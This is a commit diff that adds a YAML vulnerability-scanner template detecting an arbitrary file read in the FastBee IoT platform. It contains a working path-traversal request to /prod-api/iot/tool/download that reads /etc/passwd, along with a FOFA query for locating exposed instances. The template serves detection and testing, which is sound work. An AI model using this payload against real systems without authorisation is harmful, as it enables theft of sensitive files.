add fastbee lfi
parent
c31dce6f3b
commit
426d6ff7ee
|
@ -0,0 +1,53 @@
|
|||
id: fastbee-arbitrary-file-read
|
||||
|
||||
info:
|
||||
name: FastBee - Local File Inclusion
|
||||
author: s4e-io
|
||||
severity: high
|
||||
description: |
|
||||
Arbitrary file read vulnerability exists in FastBee IoT platform download, which may lead to sensitive information leakage, data theft and other security risks, thus causing serious harm to the system and users.
|
||||
reference:
|
||||
- https://blog.csdn.net/weixin_43167326/article/details/141806542
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: fastbee
|
||||
product: fastbee
|
||||
fofa-query: "fastbee"
|
||||
tags: fastbee,iot,lfi
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body,"<title>FastBee")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
|
||||
- type: word
|
||||
part: content_type
|
||||
words:
|
||||
- 'application/octet-stream'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue